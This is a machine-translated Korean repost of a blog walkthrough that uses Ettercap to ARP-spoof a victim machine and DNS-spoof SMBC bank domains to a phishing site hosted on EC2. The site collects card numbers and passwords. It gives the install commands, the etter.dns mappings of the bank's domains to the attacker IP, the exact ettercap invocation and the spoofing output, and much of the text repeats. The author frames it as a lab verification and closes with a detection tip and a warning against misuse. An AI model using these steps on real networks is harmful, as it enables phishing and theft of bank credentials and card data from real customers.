Ettercap으로 ARP 스푸핑
개요
이번에는 Ettercap이라는 해킹 도구를 사용하여 APR 스푸핑 + DNS 스푸핑을 시도했습니다.
ARP 스푸핑은 ARP 프로토콜의 통신을 가장하여 동일한 세그먼트의 장비가 되는 중간자 공격으로, DNS 스푸핑은 DNS 쿼리에 대한 요청을 다시 작성하는 중간자 공격입니다.
이후에서는, 이 수법을 이용해 피해 머신으로부터 정규의 SMBC에의 액세스를 사기 사이트에 유도하는 공격을 검증하고 있습니다.
준비
구성
검증을 위해 다음과 같은 구성 준비했습니다.
구성
검증을 위해 다음과 같은 구성 준비했습니다.
공격용 머신 설정
공격용 머신으로서 DNS 서버나 피해 머신과 같은 세그먼트 내에 설치되어 있는 CentoOS의 이하 버전의 머신을 이용하여 Ettercap을 설치했습니다. EPEL 리포지토리를 사용하면 YUM에서 쉽게 설치할 수있었습니다.
/etc/redhat-release
CentOS release 6.10 (Final)
$ sudo yum -y install epel-release
$ sudo yum -y install ettercap.x86_64
Ettercap의 설정 파일에서 정규 사이트의 도메인과 개조 사이트의 IP 주소를 연결합니다.
/etc/ettercap/etter.dns
www.smbc.co.jp A 13.115.73.199
smbc.co.jp A 13.115.73.199
개조 사이트 준비
AWS의 EC2에 주 1에서 만든 Docker 컨테이너를 준비하고 SMBC 용 Phishing ToolKit을 Apache의 DocumentRoot에 설치했습니다.
검증 결과
우선 피해 머신의 WEB 브라우저로 SMBC의 사이트 h tp // w w. smbc. 이. jp / pr / 그럼 x. php에 HTTP 액세스 해 봅니다. HTTP 액세스는 HTTPS로 리디렉션되어 버립니다만, 정규의 사이트에는 「/pr/index.php」에 유효한 컨텐츠가 놓여 있지 않기 때문에 이하와 같이 표시됩니다.
그런 다음 공격 컴퓨터에서 다음 명령을 실행합니다.
# ettercap -TqM arp:remote /192.168.1.132// /192.168.1.36//
부팅 후 “h”를 누르면 Help가 표시됩니다.
Text only Interface activated...
Hit 'h' for inline help
Inline help:
[vV] - change the visualization mode
[pP] - activate a plugin
[fF] - (de)activate a filter
[lL] - print the hosts list
[oO] - print the profiles list
[cC] - print the connections list
[sS] - print interfaces statistics
[<space>] - stop/cont printing packets
[qQ] - quit
사용할 플러그인을 선택하기 위해 "p"를 누르면 다음이 표시됩니다.
Available plugins :
[0] arp_cop 1.1 Report suspicious ARP activity
[0] autoadd 1.2 Automatically add new victims in the target range
[0] chk_poison 1.1 Check if the poisoning had success
[0] dns_spoof 1.1 Sends spoofed dns replies
[0] dos_attack 1.0 Run a d.o.s. attack against an IP address
[0] dummy 3.0 A plugin template (for developers)
[0] find_conn 1.0 Search connections on a switched LAN
[0] find_ettercap 2.0 Try to find ettercap activity
[0] find_ip 1.0 Search an unused IP address in the subnet
[0] finger 1.6 Fingerprint a remote host
[0] finger_submit 1.0 Submit a fingerprint to ettercap's website
[0] gre_relay 1.0 Tunnel broker for redirected GRE tunnels
[0] gw_discover 1.0 Try to find the LAN gateway
[0] isolate 1.0 Isolate an host from the lan
[0] link_type 1.0 Check the link type (hub/switch)
[0] nbns_spoof 1.1 Sends spoof NBNS replies & sends SMB challenges with custom challenge
[0] pptp_chapms1 1.0 PPTP: Forces chapms-v1 from chapms-v2
[0] pptp_clear 1.0 PPTP: Tries to force cleartext tunnel
[0] pptp_pap 1.0 PPTP: Forces PAP authentication
[0] pptp_reneg 1.0 PPTP: Forces tunnel re-negotiation
[0] rand_flood 1.0 Flood the LAN with random MAC addresses
[0] remote_browser 1.2 Sends visited URLs to the browser
[0] reply_arp 1.0 Simple arp responder
[0] repoison_arp 1.0 Repoison after broadcast ARP
[0] scan_poisoner 1.0 Actively search other poisoners
[0] search_promisc 1.2 Search promisc NICs in the LAN
[0] smb_clear 1.0 Tries to force SMB cleartext auth
[0] smb_down 1.0 Tries to force SMB to not use NTLM2 key auth
[0] smurf_attack 1.0 Run a smurf attack against specified hosts
[0] stp_mangler 1.0 Become root of a switches spanning tree
이번에는 dns_spoof 플러그인을 사용합니다.
Plugin name (0 to quit): dns_spoof
Activating dns_spoof plugin...
이것으로 준비 완료입니다.
다시 피해 머신의 WEB 브라우저에서 h tp // w w. smbc. 이. jp / pr / 그럼 x. php 에 HTTP 액세스하면 이번에는 카드 번호나 패스워드 등의 입력을 촉구하는 개조 사이트로 유도됩니다.
Ettercap에서는 다음 용으로 출력됩니다.
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
참조 자료
주 1 : AWS에서 Apache Killer를 사용해보십시오.
편집 후기
Ettercap을 이용하면 쉽게 ARP 스푸핑을 할 수 있으므로 사내 네트워크에 부정한 단말기의 접속을 검출하는 것은 필수군요. 또한이 도구는 악용을 위해 사용하지 마십시오.
Reference
이 문제에 관하여(Ettercap으로 ARP 스푸핑), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다
https://qiita.com/stcmjp/items/c4fdef464246f6a3eb4c
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념
(Collection and Share based on the CC Protocol.)
# ettercap -TqM arp:remote /192.168.1.132// /192.168.1.36//
Text only Interface activated...
Hit 'h' for inline help
Inline help:
[vV] - change the visualization mode
[pP] - activate a plugin
[fF] - (de)activate a filter
[lL] - print the hosts list
[oO] - print the profiles list
[cC] - print the connections list
[sS] - print interfaces statistics
[<space>] - stop/cont printing packets
[qQ] - quit
Available plugins :
[0] arp_cop 1.1 Report suspicious ARP activity
[0] autoadd 1.2 Automatically add new victims in the target range
[0] chk_poison 1.1 Check if the poisoning had success
[0] dns_spoof 1.1 Sends spoofed dns replies
[0] dos_attack 1.0 Run a d.o.s. attack against an IP address
[0] dummy 3.0 A plugin template (for developers)
[0] find_conn 1.0 Search connections on a switched LAN
[0] find_ettercap 2.0 Try to find ettercap activity
[0] find_ip 1.0 Search an unused IP address in the subnet
[0] finger 1.6 Fingerprint a remote host
[0] finger_submit 1.0 Submit a fingerprint to ettercap's website
[0] gre_relay 1.0 Tunnel broker for redirected GRE tunnels
[0] gw_discover 1.0 Try to find the LAN gateway
[0] isolate 1.0 Isolate an host from the lan
[0] link_type 1.0 Check the link type (hub/switch)
[0] nbns_spoof 1.1 Sends spoof NBNS replies & sends SMB challenges with custom challenge
[0] pptp_chapms1 1.0 PPTP: Forces chapms-v1 from chapms-v2
[0] pptp_clear 1.0 PPTP: Tries to force cleartext tunnel
[0] pptp_pap 1.0 PPTP: Forces PAP authentication
[0] pptp_reneg 1.0 PPTP: Forces tunnel re-negotiation
[0] rand_flood 1.0 Flood the LAN with random MAC addresses
[0] remote_browser 1.2 Sends visited URLs to the browser
[0] reply_arp 1.0 Simple arp responder
[0] repoison_arp 1.0 Repoison after broadcast ARP
[0] scan_poisoner 1.0 Actively search other poisoners
[0] search_promisc 1.2 Search promisc NICs in the LAN
[0] smb_clear 1.0 Tries to force SMB cleartext auth
[0] smb_down 1.0 Tries to force SMB to not use NTLM2 key auth
[0] smurf_attack 1.0 Run a smurf attack against specified hosts
[0] stp_mangler 1.0 Become root of a switches spanning tree
Plugin name (0 to quit): dns_spoof
Activating dns_spoof plugin...
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
주 1 : AWS에서 Apache Killer를 사용해보십시오.
편집 후기
Ettercap을 이용하면 쉽게 ARP 스푸핑을 할 수 있으므로 사내 네트워크에 부정한 단말기의 접속을 검출하는 것은 필수군요. 또한이 도구는 악용을 위해 사용하지 마십시오.
Reference
이 문제에 관하여(Ettercap으로 ARP 스푸핑), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다
https://qiita.com/stcmjp/items/c4fdef464246f6a3eb4c
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념
(Collection and Share based on the CC Protocol.)
Reference
이 문제에 관하여(Ettercap으로 ARP 스푸핑), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/stcmjp/items/c4fdef464246f6a3eb4c텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)